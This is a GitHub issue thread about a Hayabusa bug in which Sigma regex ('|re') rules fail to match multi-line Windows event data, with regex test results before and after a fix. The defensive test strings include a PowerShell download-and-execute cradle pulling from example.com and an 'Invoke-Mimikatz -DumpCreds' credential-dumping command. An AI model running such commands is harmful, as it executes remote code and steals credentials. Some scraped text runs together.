Closed fukusuket closed 11 months ago
I found another issue. According to the Sigma documentation below, regular expressions are expected to be case-insensitive. https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#general
- Regular expressions are case-sensitive by default
However, if I create a detection rule with lowercase letters as shown below, there will be 0 detection results.
...
detection:
selection:
Channel|re: 'windows powershell'
EventID: 400
condition: selection
falsepositives:
tags:
references:
ruletype: Hayabusa
(In the case above, it will be detected correctly if I change to Channel|re: 'Windows PowerShell'
)
Sorry ... 🙇 The above https://github.com/Yamato-Security/hayabusa/issues/1211#issuecomment-1801888079 case was correct behavior because case-sensitive is expected behavior.
@fukusuket Yes, I think normal wildcard matching, etc... is case-insensitive but only regex is case-sensitive.
@YamatoSecurity I checked the reproduction conditions using the code below! https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=54185c82df86fcd2077408f9dc90fa0a
The match result for a string without line breaks is as follows:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');"
Regex | Match |
---|---|
powershell.* |
true |
powershell |
false |
.*DownloadString.* |
true |
The match result for a string with line breaks is as follows:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');
Invoke-Mimikatz -DumpCreds"
Regex | Match |
---|---|
powershell.* |
false |
powershell |
false |
.*DownloadString.* |
false |
Based on the above results, The reproduction conditions are as follows.
|re
rule will not matchThe pseudo code for https://github.com/Yamato-Security/hayabusa/pull/1212 is below. The results after applying https://github.com/Yamato-Security/hayabusa/pull/1212 are as follows. https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=82a1019add2b410ec720d4f74c0d10ef
The match result for a string without line breaks is as follows:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');"
Regex | Match |
---|---|
powershell.* |
true |
powershell |
true |
.*DownloadString.* |
true |
The match result for a string with line breaks is as follows:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');
Invoke-Mimikatz -DumpCreds"
Regex | Match |
---|---|
powershell.* |
true |
powershell |
true |
.*DownloadString.* |
true |
Describe the bug
|re
modifier rule not detected correctly.Step to Reproduce
test.yml
.title: 'PwSh Engine Started' description: 'Engine state is changed from None to Available.'
id: ac2ae63b-83e6-4d06-aeaf-07409bda92c9 level: informational status: test logsource: product: windows service: powershell detection: selection: Channel: 'Windows PowerShell' EventID: 400 filter: Data|re: 'NewEngineState' condition: selection and filter falsepositives: tags: references: ruletype: Hayabusa